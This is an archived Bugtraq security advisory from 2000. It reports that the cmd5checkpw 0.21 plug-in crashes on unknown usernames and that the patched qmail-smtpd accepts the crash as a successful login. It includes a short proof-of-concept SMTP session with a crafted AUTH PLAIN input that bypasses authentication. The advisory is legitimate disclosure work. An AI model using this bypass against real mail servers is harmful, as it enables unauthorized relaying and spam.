![[LWN Logo]](/images/lcorner.png)
![[Timeline]](/images/Included.png)
|
|
|
|
Date: Mon, 16 Oct 2000 23:18:21 -0300 From: Javier Kohen <jkohen@TOUGH.COM> Subject: Authentication failure in cmd5checkpw 0.21 To: BUGTRAQ@SECURITYFOCUS.COM --7JfCtLOvnd9MIVvH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Program: cmd5checkpw Vulnerable versions: 0.21 (probably earlier, too.) Fixed versions: 0.22 URI: http://freshmeat.net/projects/cmd5checkpw/ Author: Elysium deeZine <http://www.elysium.pl/> Description: This program works as an authentication plug-in for a patch of the same author to add SMTP AUTH support to QMail. I found that if it was fed with a non-existing user name, it would segfault due to the lack of checking for the (imprabable?) reason of such an invalid input. The exploit here comes from the consecuence of this problem; the caller -in this case the patched qmail-smtpd - would take its child crashing as a successful authentication, thus validating the session. This brings an open door for spam. Even though this utility was fixed, the vulnerability in the patch to qmail-smtpd still remains, leaving the door opened to further bugs in the authentication plug-ins. Proof of concept: $ nc localhost smtp < 220 ns.foo.com.ar ESMTP > ehlo spammer.net < 250-ns.foo.com.ar < 250-AUTH=LOGIN CRAM-MD5 PLAIN < 250-AUTH LOGIN CRAM-MD5 PLAIN < 250-PIPELINING < 250 8BITMIME > auth plain < 334 ok. go on. > xyzzy<NUL>nopasswordneeded<NUL> < ??? ok. -- Javier Kohen <jkohen@tough.com> ICQ #2361802 [blashyrkh] http://www.tough.com.ar/ --7JfCtLOvnd9MIVvH Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.3 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE567btc7v1iJ0e7rERAuqLAJ4sdSLm7VEENPD3tEzc2oPvcX0KhwCfQqM1 KxhvfofJ6YabWLXy/s4Gx/s=kcGD -----END PGP SIGNATURE----- --7JfCtLOvnd9MIVvH--